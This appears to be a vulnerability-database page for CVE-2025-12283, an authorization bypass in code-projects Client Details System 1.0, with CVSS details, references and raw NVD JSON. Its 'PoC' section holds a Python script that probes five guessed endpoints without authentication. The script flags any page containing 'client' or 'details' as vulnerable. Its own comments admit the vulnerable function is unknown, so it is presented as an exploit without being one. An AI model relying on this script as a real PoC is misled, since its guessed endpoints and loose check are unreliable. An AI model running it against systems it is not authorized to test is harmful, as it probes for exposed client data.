CVE-2025-12283

Description

A security flaw has been discovered in code-projects Client Details System 1.0. The impacted element is an unknown function. The manipulation results in authorization bypass. The attack can be launched remotely. The exploit has been released to the public and may be exploited.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fabian:client_details_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Client Details System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-12283 PoC - Authorization Bypass in Client Details System 1.0
# Target: code-projects Client Details System 1.0
# Vulnerability: Authorization Bypass
# CVSS: 4.3 (MEDIUM)

import requests
import sys

target = input("Enter target URL (e.g., http://target.com): ").rstrip('/')

# Step 1: Identify the vulnerable endpoint
# The vulnerability affects an unknown function in the system
vulnerable_endpoints = [
    "/client-details",
    "/admin/client-list",
    "/api/clients",
    "/client/profile",
    "/user/details"
]

print("[*] Testing for Authorization Bypass vulnerability (CVE-2025-12283)")
print(f"[*] Target: {target}")

# Step 2: Test with low-privilege or unauthenticated access
# Since PR:L (Low Privileges required), we attempt access without proper authorization

for endpoint in vulnerable_endpoints:
    url = f"{target}{endpoint}"
    
    # Attempt 1: Direct access without authentication
    print(f"\n[*] Testing endpoint: {endpoint}")
    
    # Low-privilege user session (if available)
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    
    try:
        response = requests.get(url, headers=headers, timeout=10, allow_redirects=False)
        
        if response.status_code == 200:
            # Check if sensitive data is exposed
            if 'client' in response.text.lower() or 'details' in response.text.lower():
                print(f"[!] VULNERABLE: {endpoint} - May expose sensitive client data")
                print(f"[+] Status Code: {response.status_code}")
                print(f"[+] Response Length: {len(response.text)} bytes")
        elif response.status_code == 403 or response.status_code == 401:
            print(f"[-] Protected: {endpoint} - Requires authentication")
        else:
            print(f"[*] Status: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error accessing {endpoint}: {e}")

print("\n[*] Scan completed")
print("[!] Note: This PoC is for educational purposes only")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12283
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12283
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12283/
[4] VulDB https://vuldb.com/cve/CVE-2025-12283
[5] https://code-projects.org/
[6] https://github.com/hellonewbie/tutorial/issues/11
[7] https://vuldb.com/?ctiid.329953
[8] https://vuldb.com/?id.329953
[9] https://vuldb.com/?submit.674213

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12283", "sourceIdentifier": "[email protected]", "published": "2025-10-27T14:15:39.997", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in code-projects Client Details System 1.0. The impacted element is an unknown function. The manipulation results in authorization bypass. The attack can be launched remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-639"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:client_details_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BF8DA67D-864D-46F0-A564-02427490562A"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/hellonewbie/tutorial/issues/11", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329953", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329953", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.674213", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}